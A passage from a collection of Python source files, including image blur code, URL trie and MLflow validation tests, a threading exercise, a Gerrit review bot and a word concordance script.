Carlos\r\n\"\"\"\r\ndef badFun(n):\r\n try:\r\n return n / 0\r\n except:\r\n print(\"Error en cualquier parte\")\r\n raise \r\ntry:\r\n badFun(0)\r\nexcept ArithmeticError:\r\n print(\"Error lanzado por raise\")\r\nprint(\"THE END.\")\r\n","sub_path":"raise.py","file_name":"raise.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"20721398","text":"import math\nimport numpy as np\nfrom numba import jit\n\n\n@jit\ndef cal_blur(imgarray, theta, delta, L, S=0):\n imgheight = imgarray.shape[0]\n imgwidth = imgarray.shape[1]\n c0 = int(imgheight / 2)\n c1 = int(imgwidth / 2)\n theta = theta / 180 * math.pi\n delta = delta / 180 * math.pi\n blurred_imgarray = np.copy(imgarray)\n for x in range(0, imgheight):\n for y in range(0, imgwidth):\n R = math.sqrt((x - c0) ** 2 + (y - c1) ** 2)\n alpha = math.atan2(y - c1, x - c0)\n X_cos = L * math.cos(delta) - S * R * math.cos(alpha)\n Y_sin = L * math.sin(delta) - S * R * math.sin(alpha)\n N = int(\n max(\n abs(R * math.cos(alpha + theta) + X_cos + c0 - x),\n abs(R * math.sin(alpha + theta) + Y_sin + c1 - y),\n )\n )\n if N <= 0:\n continue\n count = 0\n sum_r, sum_g, sum_b = 0, 0, 0\n for i in range(0, N + 1):\n n = i / N\n xt = int(R * math.cos(alpha + n * theta) + n * X_cos + c0)\n yt = int(R * math.sin(alpha + n * theta) + n * Y_sin + c1)\n if xt < 0 or xt >= imgheight:\n continue\n elif yt < 0 or yt >= imgwidth:\n continue\n else:\n sum_r += imgarray[xt, yt][0]\n sum_g += imgarray[xt, yt][1]\n sum_b += imgarray[xt, yt][2]\n count += 1\n blurred_imgarray[x, y] = np.array(\n [sum_r / count, sum_g / count, sum_b / count]\n )\n return blurred_imgarray\n","sub_path":"blur.py","file_name":"blur.py","file_ext":"py","file_size_in_byte":1688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"537134951","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# =============================================================================\n# Ural LRUTrie Unit Tests\n# =============================================================================\nfrom ural.lru import LRUTrie, NormalizedLRUTrie\n\n\nclass TestNormalizedLRUTrie(object):\n def test_lru_trie(self):\n trie = LRUTrie()\n\n trie.set(\"http://lemonde.fr\", 1)\n trie.set(\"http://lemonde.fr/articles/economy\", 2)\n\n assert len(trie) == 2\n\n assert list(trie) == [1, 2]\n\n assert trie.match(\"http://lefigaro.fr\") is None\n assert trie.match(\"http://lemonde.fr/categories/whatever\") == 1\n assert trie.match(\"http://lemonde.fr/articles/economy/index.html\") == 2\n\n trie.set_lru([\"s:http\", \"h:fr\", \"h:lefigaro\"], 3)\n trie.set_lru(\"s:http|h:fr|h:lefigaro|p:articles|p:whatever.html|\", 4)\n\n assert len(trie) == 4\n\n assert trie.match_lru([\"s:http\", \"h:fr\", \"h:lefigaro\", \"p:test\"]) == 3\n assert trie.match_lru(\"s:http|h:fr|h:lefigaro|p:articles|p:whatever.html|\") == 4\n\n def test_normalized_lru_trie(self):\n trie = NormalizedLRUTrie()\n trie.set(\"http://www.lemonde.fr\", {\"media\": \"lemonde\"})\n trie.set(\n \"http://www.lemonde.fr/politique/article\",\n {\"media\": \"lemonde\", \"type\": \"article\"},\n )\n assert trie.match(\"http://www.lemonde.fr\") == {\"media\": \"lemonde\"}\n assert trie.match(\"http://www.lemonde.fr/politique/\") == {\"media\": \"lemonde\"}\n assert trie.match(\"http://www.lemonde.fr/politique/article\") == {\n \"media\": \"lemonde\",\n \"type\": \"article\",\n }\n assert trie.match(\"http://www.lemonde.fr/politique/article/randompath\") == {\n \"media\": \"lemonde\",\n \"type\": \"article\",\n }\n assert trie.match(\"http://www.legorafi.fr\") is None\n\n assert len(trie) == 2\n\n assert list(trie) == [\n {\"media\": \"lemonde\"},\n {\"media\": \"lemonde\", \"type\": \"article\"},\n ]\n\n def test_edge_cases(self):\n trie = LRUTrie()\n\n assert (\n trie.match(\n \"http://127.0.0.1/economie/2019/01/08/un-journaliste-poursuit-richard-ferrand-pour-lavoir-bloque-sur-twitter/\"\n )\n is None\n )\n\n def test_trailing_path(self):\n trie = LRUTrie()\n\n trie.set(\"http://www.zejournal.mobi/\", \"Ze Journal mobi\")\n\n assert (\n trie.match(\"http://www.zejournal.mobi/id/news/show_detail/14853\")\n == \"Ze Journal mobi\"\n )\n","sub_path":"test/lru_trie_test.py","file_name":"lru_trie_test.py","file_ext":"py","file_size_in_byte":2585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"133765391","text":"\"\"\"\nThis program has been return fr the exercise 1\nof the Advanced Operating System course instructed\nby Dr. Hedieh Sajedi\nStudent:Abdolnabi Zameni\nDate: 13 Azar 1399\n\"\"\"\n#importing the threading module\nimport threading\n\ndef print_random_value(step):\n \"\"\"\n Function to print the given num step to output\n \"\"\"\n ordinal_numbers = {1: \"st\",\n 2: \"nd\",\n 3: \"rd\",\n 4: \"th\"\n }\n\n print(format(step)+(ordinal_numbers.get(step,False) or ordinal_numbers[4] )+\" thread output is: {}\".format(step))\n\n\n\n\nif __name__ == \"__main__\":\n\n LCL = int(input(\"Starting value to display [enter to set default 1]:\") or 1)\n UCL = int(input(\"Ending value to display [enter to set default 9]:\") or 9) + 1\n #loop over the range of 1 to 10, to create totally 9 threads displaying from 1 to 9\n for i in range(LCL,UCL):\n # creating a working thread\n working_thread = threading.Thread(target=print_random_value, args=(i,))\n # starting the working thread\n working_thread.start()\n # If you want to wait until the working thread is completely executed uncomment next line\n # working_thread.join()\n\n # If you want to know when the program finished running all of the threads completely uncomment next line.\n # Note: If you keep the working_thread.join() commented you may see the \"Done!\" message before all of the threads\n # completed successfully.\n # print(\"\\nDone!\")","sub_path":"AOS/threading_exercise.py","file_name":"threading_exercise.py","file_ext":"py","file_size_in_byte":1500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"239180269","text":"import re, sys\n\ndef fixURL(line):\n urlMatch = re.search('\"(.*)\"', line)\n if urlMatch:\n url = urlMatch.group(1)\n displayUrl = url.replace('http://', '').replace('https://', '').replace('www.', '')\n if '@' in url:\n url = 'mailto:'+url\n\n return line[:urlMatch.start()] + '<a href=\"' + url + '\">' + displayUrl + '</a>' + line[urlMatch.end():]\n else:\n return line\n\ndef fixSpecialHTML(line):\n specialMatch = re.search('{{(.*)}}', line) \n if specialMatch:\n specialName = specialMatch.group(1)\n return line[:specialMatch.start()] + '<span class=\"special\" id=\"' + specialName + '\">' + specialName + '</span>' + line[specialMatch.end():]\n else:\n return line\n\ndef addLineNumber(line, lineNum):\n if lineNum < 10:\n lineNum = ' '+str(lineNum)\n return '<tr><td class=\"gutterText\">'+str(lineNum)+'</td><td class=\"code\"><pre>'+line+'</pre></td></tr>'\n\ndef fixLine(line, lineNum):\n line = fixURL(line)\n line = fixSpecialHTML(line)\n line = addLineNumber(line, lineNum)\n return line\n\ndef rlcomFormat(inPath, outPath):\n inFile = open(inPath, 'r')\n outFile = open(outPath, 'w')\n\n lineNum = 1\n for line in inFile:\n outFile.write(fixLine(line, lineNum))\n lineNum += 1\n \n inFile.close()\n outFile.close()\n\nif __name__ == '__main__':\n if len(sys.argv) < 3:\n print('Usage: format.py <inpath> <outpath>')\n else:\n rlcomFormat(sys.argv[1], sys.argv[2])\n","sub_path":"format.py","file_name":"format.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"225322768","text":"import re\n\n\ndef writeline(line):\n try:\n tclfile = open(\"beijing3pmfilterspeed500.tcl\",\"a\")\n tclfile.writelines(line)\n finally:\n\n if tclfile:\n tclfile.close()\n\n\ndef getspeed(x2, y2, x1, y1, t2, t1):\n return int((abs(x2 - x1) + abs(y2 - y1)) / (t2 - t1))\n\n\ndef gettime(line):\n pattere = re.compile(r'ns_ at [0-9]\\d*')\n match = pattere.search(line)\n if match:\n numpattern = re.compile('[0-9]\\d*')\n nummatch = numpattern.search(match.group())\n time = nummatch.group()\n return int(time)\n else:\n return -666\n\n\ndef getxy(line):\n pattere = re.compile(r'setdest [0-9]\\d* [0-9]\\d*')\n match = pattere.search(line)\n if match:\n numpattern = re.compile('[0-9]\\d*')\n nummatch = numpattern.findall(match.group())\n y = nummatch.pop()\n x = nummatch.pop()\n xy = list()\n xy.append(y)\n xy.append(x)\n return xy\n else:\n return -666\n\n\nclass Node:\n def __init__(self, id, speed, times):\n self.id = id\n self.speed = speed\n self.times = times\n def __repr__(self):\n return repr((self.id, self.speed, self.times))\n\n\ndef speedset(filename):\n with open(filename) as f:\n content = f.readlines()\n id = -666\n nodelist = list()\n for line in content:\n xy = getxy(line)\n if xy == -666:\n # print(\"pass\")\n pass\n else:\n pattern = re.compile(r'node_\\([0-9]\\d*')\n match = pattern.search(line)\n if match:\n idpattern = re.compile('[0-9]\\d*')\n idmatch = idpattern.search(match.group())\n idnum = int(idmatch.group())\n if id == -666:\n id = idnum\n # print(id)\n # print(node.id)\n xy1 = getxy(line)\n time1 = gettime(line)\n times = 0\n # print(\"id = -666\")\n else:\n if id == idnum:\n xy2 = getxy(line)\n time2 = gettime(line)\n times = times + 1\n # print(\"id = idnum\")\n # print(\"idnum = \"+ str(idnum))\n else:\n if time2 == time1:\n # print(\"time2 = time1\")\n pass\n else:\n # print(xy2)\n # print(id)\n if len(xy2):\n x2 = xy2.pop()\n y2 = xy2.pop()\n x1 = xy1.pop()\n y1 = xy1.pop()\n # print(\"x2 =\" + x2 + \" y2 =\" + y2 + \" x1 =\" + x1 + \" y1 =\" + y1 + \" time2 =\" + str(time2) + \" time1 =\" + str(time1))\n speed = getspeed(int(x2), int(y2), int(x1), int(y1), time2, time1)\n nodelist.append(Node(id, speed, times))\n id = idnum\n time1 = gettime(line)\n xy1 = getxy(line)\n else:\n print(str(id) + \"list is empty\")\n id = -666\n print(nodelist)\n sortlist = sorted(nodelist, key=lambda node: node.speed, reverse=True)\n speedset = set()\n print(sortlist)\n num = 250\n for node in sortlist:\n speedset.add(node.id)\n print(node)\n if len(speedset) == num:\n break\n sortlistTime = sorted(nodelist, key=lambda node: node.times, reverse=True)\n for node in sortlistTime:\n if node.id not in speedset:\n speedset.add(node.id)\n print(node)\n if len(speedset) == 500:\n break\n print(speedset)\n return speedset\n\n\n# def filter(filename):\n# idset = speedset(filename)\n# print(idset)\n# with open(filename) as f:\n# content = f.readlines()\n# i = 0\n# number = -123\n# for line in content:\n# # print(line)\n# pattern = re.compile(r'node_\\([0-9]\\d*')\n# match = pattern.search(line)\n# if match:\n# # print(match.group())\n# numpattern = re.compile('[0-9]\\d*')\n# nummatch = numpattern.search(match.group())\n# num = int(nummatch.group())\n# if num in idset:\n# atpattern = re.compile(r'at [0-9]\\d*')\n# atmatch = atpattern.search(line)\n# if atmatch:\n# atnumpattern = re.compile('[0-9]\\d*')\n# atnummatch = atnumpattern.search(atmatch.group())\n# atnum = int(atnummatch.group())\n# if atnum <= 600:\n# if number == -123:\n# writeline(line.replace(match.group(), 'node_(' + str(i)))\n# number = num\n# else:\n# if number == num:\n# writeline(line.replace(match.group(), 'node_(' + str(i)))\n# else:\n# i = i + 1\n# number = num\n# writeline(line.replace(match.group(), 'node_(' + str(i)))\n# else:\n# pass\n# # print('not match')\n\ndef filter(filename):\n idset = speedset(filename)\n print(idset)\n with open(filename) as f:\n content = f.readlines()\n i = 0\n number = -123\n for line in content:\n # print(line)\n pattern = re.compile(r'node_\\([0-9]\\d*')\n match = pattern.search(line)\n if match:\n # print(match.group())\n numpattern = re.compile('[0-9]\\d*')\n nummatch = numpattern.search(match.group())\n num = int(nummatch.group())\n if num in idset:\n if number == -123:\n writeline(line.replace(match.group(), 'node_(' + str(i)))\n number = num\n else:\n if number == num:\n writeline(line.replace(match.group(), 'node_(' + str(i)))\n else:\n i = i + 1\n number = num\n writeline(line.replace(match.group(), 'node_(' + str(i)))\n else:\n pass\n # print('not match')\n\n\nfilter(\"beijing3pm.tcl\")\n\n","sub_path":"2019-01-28/speedfilter.py","file_name":"speedfilter.py","file_ext":"py","file_size_in_byte":6589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"216656202","text":"import tangent\n# Tangent has recipes for auto-generating derivatives for code that contains if statements and loops\n\n\ndef f(x):\n if x > 0:\n a = x ** 2.0\n else:\n a = -x\n out = a * a\n return out\n\ndfdW = tangent.grad(f, verbose=1)\nprint(dfdW)\n","sub_path":"controlFlow.py","file_name":"controlFlow.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"625277364","text":"#!/usr/bin/env python3\n\nfrom reviewer import Reviewer\nfrom gerrit import Gerrit, GerritRevision, GerritMessage\n\nfrom trollreview import ReviewType\nfrom trollreviewerfromgit import FromgitChangeReviewer\nfrom trollreviewerupstream import UpstreamChangeReviewer\nfrom trollreviewerfromlist import FromlistChangeReviewer\nfrom trollreviewerchromium import ChromiumChangeReviewer\n\nimport argparse\nimport datetime\nimport json\nimport requests\nimport sys\nimport time\n\nclass Troll(object):\n def __init__(self, url, args):\n self.url = url\n self.args = args\n self.gerrit = Gerrit(url)\n self.tag = 'autogenerated:review-o-matic'\n self.blacklist = {}\n self.stats = { str(ReviewType.SUCCESS): 0, str(ReviewType.BACKPORT): 0,\n str(ReviewType.ALTERED_UPSTREAM): 0,\n str(ReviewType.MISSING_FIELDS): 0,\n str(ReviewType.MISSING_HASH): 0,\n str(ReviewType.INVALID_HASH): 0,\n str(ReviewType.MISSING_AM): 0,\n str(ReviewType.INCORRECT_PREFIX): 0,\n str(ReviewType.FIXES_REF): 0,\n str(ReviewType.KCONFIG_CHANGE): 0,\n str(ReviewType.IN_MAINLINE): 0,\n str(ReviewType.UPSTREAM_COMMENTS): 0 }\n\n def inc_stat(self, review_type):\n if self.args.dry_run:\n return\n key = str(review_type)\n if not self.stats.get(key):\n self.stats[key] = 1\n else:\n self.stats[key] += 1\n\n def do_review(self, change, review):\n print('Review for change: {}'.format(change.url()))\n print(' Issues: {}, Feedback: {}, Vote:{}, Notify:{}'.format(\n review.issues.keys(), review.feedback.keys(), review.vote,\n review.notify))\n\n if review.dry_run:\n print(review.generate_review_message())\n if review.inline_comments:\n print('')\n print('-- Inline comments:')\n for f,comments in review.inline_comments.items():\n for c in comments:\n print('{}:{}'.format(f, c['line']))\n print(c['message'])\n\n print('------')\n return\n\n for i in review.issues:\n self.inc_stat(i)\n for f in review.feedback:\n self.inc_stat(f)\n self.gerrit.review(change, self.tag, review.generate_review_message(),\n review.notify, vote_code_review=review.vote,\n inline_comments=review.inline_comments)\n\n def get_changes(self, prefix):\n message = '{}:'.format(prefix)\n after = datetime.date.today() - datetime.timedelta(days=5)\n changes = self.gerrit.query_changes(status='open', message=message,\n after=after, project='chromiumos/third_party/kernel')\n return changes\n\n def add_change_to_blacklist(self, change):\n self.blacklist[change.number] = change.current_revision.number\n\n def is_change_in_blacklist(self, change):\n return self.blacklist.get(change.number) == change.current_revision.number\n\n def process_changes(self, changes):\n rev = Reviewer(git_dir=self.args.git_dir, verbose=self.args.verbose,\n chatty=self.args.chatty)\n ret = 0\n for c in changes:\n if self.args.verbose:\n print('Processing change {}'.format(c.url()))\n\n force_review = self.args.force_cl or self.args.force_all\n\n days_since_last_review = None\n if not force_review:\n for m in c.messages:\n if m.tag == self.tag and m.revision_num == c.current_revision.number:\n days_since_last_review = (datetime.datetime.utcnow() - m.date).days\n\n if self.args.verbose and days_since_last_review != None:\n print(' Reviewed {} days ago'.format(days_since_last_review))\n\n # Find a reviewer and blacklist if not found\n reviewer = None\n if FromlistChangeReviewer.can_review_change(c, days_since_last_review):\n reviewer = FromlistChangeReviewer(rev, c, self.args.dry_run)\n elif FromgitChangeReviewer.can_review_change(c, days_since_last_review):\n reviewer = FromgitChangeReviewer(rev, c, self.args.dry_run,\n days_since_last_review)\n elif UpstreamChangeReviewer.can_review_change(c, days_since_last_review):\n reviewer = UpstreamChangeReviewer(rev, c, self.args.dry_run)\n elif self.args.kconfig_hound and \\\n ChromiumChangeReviewer.can_review_change(c, days_since_last_review):\n reviewer = ChromiumChangeReviewer(rev, c, self.args.dry_run,\n self.args.verbose)\n if not reviewer:\n self.add_change_to_blacklist(c)\n continue\n\n if not force_review and self.is_change_in_blacklist(c):\n continue\n\n result = reviewer.review_patch()\n if result:\n self.do_review(c, result)\n ret += 1\n\n self.add_change_to_blacklist(c)\n\n return ret\n\n def update_stats(self):\n if not self.args.dry_run and self.args.stats_file:\n with open(self.args.stats_file, 'wt') as f:\n json.dump(self.stats, f)\n print('--')\n summary = ' Summary: '\n total = 0\n for k,v in self.stats.items():\n summary += '{}={} '.format(k,v)\n total += v\n summary += 'total={}'.format(total)\n print(summary)\n print('')\n\n def run(self):\n if self.args.force_cl:\n c = self.gerrit.get_change(self.args.force_cl, self.args.force_rev)\n print('Force reviewing change {}'.format(c))\n self.process_changes([c])\n return\n\n if self.args.stats_file:\n try:\n with open(self.args.stats_file, 'rt') as f:\n self.stats = json.load(f)\n except FileNotFoundError:\n self.update_stats()\n\n prefixes = ['UPSTREAM', 'BACKPORT', 'FROMGIT', 'FROMLIST']\n if self.args.kconfig_hound:\n prefixes += ['CHROMIUM']\n\n if self.args.force_prefix:\n prefixes = [self.args.force_prefix]\n\n while True:\n try:\n did_review = 0\n for p in prefixes:\n changes = self.get_changes(p)\n if self.args.verbose:\n print('{} changes for prefix {}'.format(len(changes), p))\n did_review += self.process_changes(changes)\n if did_review > 0:\n self.update_stats()\n if not self.args.daemon:\n break\n if self.args.verbose:\n print('Finished! Going to sleep until next run')\n\n except (requests.exceptions.HTTPError, OSError) as e:\n sys.stderr.write('Error getting changes: ({})\\n'.format(str(e)))\n time.sleep(60)\n\n time.sleep(120)\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Troll gerrit reviews')\n parser.add_argument('--git-dir', default=None, help='Path to git directory')\n parser.add_argument('--verbose', help='print commits', action='store_true')\n parser.add_argument('--chatty', help='print diffs', action='store_true')\n parser.add_argument('--daemon', action='store_true',\n help='Run in daemon mode, for continuous trolling')\n parser.add_argument('--dry-run', action='store_true', default=False,\n help='skip the review step')\n parser.add_argument('--force-cl', default=None, help='Force review a CL')\n parser.add_argument('--force-rev', default=None,\n help=('Specify a specific revision of the force-cl to '\n 'review (ignored if force-cl is not true)'))\n parser.add_argument('--force-all', action='store_true', default=False,\n help='Force review all (implies dry-run)')\n parser.add_argument('--force-prefix', default=None,\n help='Only search for the provided prefix')\n parser.add_argument('--stats-file', default=None, help='Path to stats file')\n parser.add_argument('--kconfig-hound', default=None, action='store_true',\n help='Compute and post the total difference for kconfig changes')\n args = parser.parse_args()\n\n if args.force_all:\n args.dry_run = True\n\n troll = Troll('https://chromium-review.googlesource.com', args)\n troll.run()\n\nif __name__ == '__main__':\n sys.exit(main())\n","sub_path":"troll-o-matic.py","file_name":"troll-o-matic.py","file_ext":"py","file_size_in_byte":7952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"479315652","text":"import copy\nimport pytest\n\nimport mlflow\nfrom mlflow.exceptions import MlflowException\nfrom mlflow.entities import Metric, Param, RunTag\nfrom mlflow.protos.databricks_pb2 import ErrorCode, INVALID_PARAMETER_VALUE\nfrom mlflow.utils.validation import (\n _is_numeric,\n _validate_metric_name,\n _validate_param_name,\n _validate_tag_name,\n _validate_run_id,\n _validate_batch_log_data,\n _validate_batch_log_limits,\n _validate_experiment_artifact_location,\n _validate_db_type_string,\n _validate_experiment_name,\n)\n\nGOOD_METRIC_OR_PARAM_NAMES = [\n \"a\",\n \"Ab-5_\",\n \"a/b/c\",\n \"a.b.c\",\n \".a\",\n \"b.\",\n \"a..a/._./o_O/.e.\",\n \"a b/c d\",\n]\nBAD_METRIC_OR_PARAM_NAMES = [\n \"\",\n \".\",\n \"/\",\n \"..\",\n \"//\",\n \"a//b\",\n \"a/./b\",\n \"/a\",\n \"a/\",\n \":\",\n \"\\\\\",\n \"./\",\n \"/./\",\n]\n\n\ndef test_is_numeric():\n assert _is_numeric(0)\n assert _is_numeric(0.0)\n assert not _is_numeric(True)\n assert not _is_numeric(False)\n assert not _is_numeric(\"0\")\n assert not _is_numeric(None)\n\n\ndef test_validate_metric_name():\n for good_name in GOOD_METRIC_OR_PARAM_NAMES:\n _validate_metric_name(good_name)\n for bad_name in BAD_METRIC_OR_PARAM_NAMES:\n with pytest.raises(MlflowException, match=\"Invalid metric name\") as e:\n _validate_metric_name(bad_name)\n assert e.value.error_code == ErrorCode.Name(INVALID_PARAMETER_VALUE)\n\n\ndef test_validate_param_name():\n for good_name in GOOD_METRIC_OR_PARAM_NAMES:\n _validate_param_name(good_name)\n for bad_name in BAD_METRIC_OR_PARAM_NAMES:\n with pytest.raises(MlflowException, match=\"Invalid parameter name\") as e:\n _validate_param_name(bad_name)\n assert e.value.error_code == ErrorCode.Name(INVALID_PARAMETER_VALUE)\n\n\ndef test_validate_tag_name():\n for good_name in GOOD_METRIC_OR_PARAM_NAMES:\n _validate_tag_name(good_name)\n for bad_name in BAD_METRIC_OR_PARAM_NAMES:\n with pytest.raises(MlflowException, match=\"Invalid tag name\") as e:\n _validate_tag_name(bad_name)\n assert e.value.error_code == ErrorCode.Name(INVALID_PARAMETER_VALUE)\n\n\ndef test_validate_run_id():\n for good_id in [\n \"a\" * 32,\n \"f0\" * 16,\n \"abcdef0123456789\" * 2,\n \"a\" * 33,\n \"a\" * 31,\n \"a\" * 256,\n \"A\" * 32,\n \"g\" * 32,\n \"a_\" * 32,\n \"abcdefghijklmnopqrstuvqxyz\",\n ]:\n _validate_run_id(good_id)\n for bad_id in [\"a/bc\" * 8, \"\", \"a\" * 400, \"*\" * 5]:\n with pytest.raises(MlflowException, match=\"Invalid run ID\") as e:\n _validate_run_id(bad_id)\n assert e.value.error_code == ErrorCode.Name(INVALID_PARAMETER_VALUE)\n\n\ndef test_validate_batch_log_limits():\n too_many_metrics = [Metric(\"metric-key-%s\" % i, 1, 0, i * 2) for i in range(1001)]\n too_many_params = [Param(\"param-key-%s\" % i, \"b\") for i in range(101)]\n too_many_tags = [RunTag(\"tag-key-%s\" % i, \"b\") for i in range(101)]\n\n good_kwargs = {\"metrics\": [], \"params\": [], \"tags\": []}\n bad_kwargs = {\n \"metrics\": [too_many_metrics],\n \"params\": [too_many_params],\n \"tags\": [too_many_tags],\n }\n match = r\"A batch logging request can contain at most \\d+\"\n for arg_name, arg_values in bad_kwargs.items():\n for arg_value in arg_values:\n final_kwargs = copy.deepcopy(good_kwargs)\n final_kwargs[arg_name] = arg_value\n with pytest.raises(MlflowException, match=match):\n _validate_batch_log_limits(**final_kwargs)\n # Test the case where there are too many entities in aggregate\n with pytest.raises(MlflowException, match=match):\n _validate_batch_log_limits(too_many_metrics[:900], too_many_params[:51], too_many_tags[:50])\n # Test that we don't reject entities within the limit\n _validate_batch_log_limits(too_many_metrics[:1000], [], [])\n _validate_batch_log_limits([], too_many_params[:100], [])\n _validate_batch_log_limits([], [], too_many_tags[:100])\n\n\ndef test_validate_batch_log_data():\n metrics_with_bad_key = [\n Metric(\"good-metric-key\", 1.0, 0, 0),\n Metric(\"super-long-bad-key\" * 1000, 4.0, 0, 0),\n ]\n metrics_with_bad_val = [Metric(\"good-metric-key\", \"not-a-double-val\", 0, 0)]\n metrics_with_bool_val = [Metric(\"good-metric-key\", True, 0, 0)]\n metrics_with_bad_ts = [Metric(\"good-metric-key\", 1.0, \"not-a-timestamp\", 0)]\n metrics_with_neg_ts = [Metric(\"good-metric-key\", 1.0, -123, 0)]\n metrics_with_bad_step = [Metric(\"good-metric-key\", 1.0, 0, \"not-a-step\")]\n params_with_bad_key = [\n Param(\"good-param-key\", \"hi\"),\n Param(\"super-long-bad-key\" * 1000, \"but-good-val\"),\n ]\n params_with_bad_val = [\n Param(\"good-param-key\", \"hi\"),\n Param(\"another-good-key\", \"but-bad-val\" * 1000),\n ]\n tags_with_bad_key = [\n RunTag(\"good-tag-key\", \"hi\"),\n RunTag(\"super-long-bad-key\" * 1000, \"but-good-val\"),\n ]\n tags_with_bad_val = [\n RunTag(\"good-tag-key\", \"hi\"),\n RunTag(\"another-good-key\", \"but-bad-val\" * 1000),\n ]\n bad_kwargs = {\n \"metrics\": [\n metrics_with_bad_key,\n metrics_with_bad_val,\n metrics_with_bool_val,\n metrics_with_bad_ts,\n metrics_with_neg_ts,\n metrics_with_bad_step,\n ],\n \"params\": [params_with_bad_key, params_with_bad_val],\n \"tags\": [tags_with_bad_key, tags_with_bad_val],\n }\n good_kwargs = {\"metrics\": [], \"params\": [], \"tags\": []}\n for arg_name, arg_values in bad_kwargs.items():\n for arg_value in arg_values:\n final_kwargs = copy.deepcopy(good_kwargs)\n final_kwargs[arg_name] = arg_value\n with pytest.raises(MlflowException, match=r\".+\"):\n _validate_batch_log_data(**final_kwargs)\n # Test that we don't reject entities within the limit\n _validate_batch_log_data(\n metrics=[Metric(\"metric-key\", 1.0, 0, 0)],\n params=[Param(\"param-key\", \"param-val\")],\n tags=[RunTag(\"tag-key\", \"tag-val\")],\n )\n\n\ndef test_validate_experiment_artifact_location():\n _validate_experiment_artifact_location(\"abcde\")\n _validate_experiment_artifact_location(None)\n with pytest.raises(MlflowException, match=\"Artifact location cannot be a runs:/ URI\"):\n _validate_experiment_artifact_location(\"runs:/blah/bleh/blergh\")\n\n\ndef test_validate_experiment_name():\n _validate_experiment_name(\"validstring\")\n bytestring = b\"test byte string\"\n _validate_experiment_name(bytestring.decode(\"utf-8\"))\n for invalid_name in [\"\", 12, 12.7, None, {}, []]:\n with pytest.raises(MlflowException, match=\"Invalid experiment name\"):\n _validate_experiment_name(invalid_name)\n\n\ndef test_validate_list_experiments_max_results():\n client = mlflow.tracking.MlflowClient()\n client.list_experiments(max_results=50)\n with pytest.raises(MlflowException, match=\"It must be at most 50000\"):\n client.list_experiments(max_results=50001)\n for invalid_num in [-12, 0]:\n with pytest.raises(MlflowException, match=\"It must be at least 1\"):\n client.list_experiments(max_results=invalid_num)\n\n\ndef test_db_type():\n for db_type in [\"mysql\", \"mssql\", \"postgresql\", \"sqlite\"]:\n # should not raise an exception\n _validate_db_type_string(db_type)\n\n # error cases\n for db_type in [\"MySQL\", \"mongo\", \"cassandra\", \"sql\", \"\"]:\n with pytest.raises(MlflowException, match=\"Invalid database engine\") as e:\n _validate_db_type_string(db_type)\n assert \"Invalid database engine\" in e.value.message\n","sub_path":"tests/utils/test_validation.py","file_name":"test_validation.py","file_ext":"py","file_size_in_byte":7632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"279656240","text":"#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n\nimport os\nimport sys\n\nfile_category = ['.java']\n\nwhite_list = []\ndef read_service_info(service_path):\n tmp_list = []\n with open(service_path) as sp:\n for line in sp:\n tmp_str = line.strip()\n tmp_list.append(tmp_str)\n return tmp_list\n\ndef for_class(file_path, object_file):\n white_list = read_service_info('./service_list.txt')\n for filename in os.listdir(file_path):\n fp = os.path.join(file_path, filename)\n if os.path.isfile(fp):\n if os.path.splitext(fp)[1] in file_category:\n if fp.split('/')[-1] not in white_list:\n# print fp\n arg0 = object_file\n arg1 = fp\n# os.system('./class_relation.sh ' + arg0 + ' ' + arg1)\n tmp_str = object_file.split('.')[0]\n with open(fp) as f:\n for line in f:\n if ((' ' + tmp_str + ' ') in line and ';' in line and '(' not in line and '//' not in line and '*' not in line) or ((' ' + tmp_str + '.') in line and '//' not in line and '*' not in line):\n if (' ' + tmp_str + '.') in line:\n key_str = line.split('.')[0].strip()\n if len(key_str.split(' ')) > 1:\n break\n# print fp + ': ' + key_str\n os.system('./class_relation.sh ' + arg0 + ' ' + arg1 + ' ' + key_str)\n break\n else:\n key_str = line.split(' ')[-1].split(';')[0] \n# print fp + ': ' + key_str\n os.system('./class_relation.sh ' + arg0 + ' ' + arg1 + ' ' + key_str)\n break\n\n elif os.path.isdir(fp):\n for_class(fp, object_file)\n\nfor_class(sys.argv[1], sys.argv[2])\n","sub_path":"for_class.py","file_name":"for_class.py","file_ext":"py","file_size_in_byte":2076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"100515637","text":"from word_histogram import * \r\nfrom build_word_list import *\r\n\r\ndef concordance(filename): \r\n \r\n infile = open(filename, \"r\")\r\n word_list_actuall = build_word_list(filename)\r\n concordance_dict = {} \r\n line_number = 1\r\n for line in infile:\r\n \r\n word_list = line.split()\r\n \r\n for word in word_list:\r\n word = word.strip(string.punctuation).lower()\r\n\r\n for thisword in word_list_actuall: \r\n if thisword == word:\r\n if concordance_dict.get(thisword): \r\n value = concordance_dict[thisword]\r\n value.append(line_number)\r\n concordance_dict[thisword] = value\r\n \r\n else:\r\n new_value = []\r\n new_value.append(line_number)\r\n concordance_dict[thisword] = new_value\r\n \r\n line_number += 1 \r\n \r\n #remove other occurences\r\n for key in concordance_dict:\r\n concordance_dict[key] = list(set(concordance_dict[key]))\r\n \r\n \r\n return concordance_dict \r\n \r\n\r\ndef print_sorted_dict(dictionary): \r\n \r\n sorted_keys = sorted(dictionary)\r\n \r\n for key in sorted_keys:\r\n print(key, \" : \", dictionary[key])\r\n \r\n\r\nprint_sorted_dict(concordance(\"sons_of_martha.txt\"))","sub_path":"old/labs/Lab 10 Better/concordance 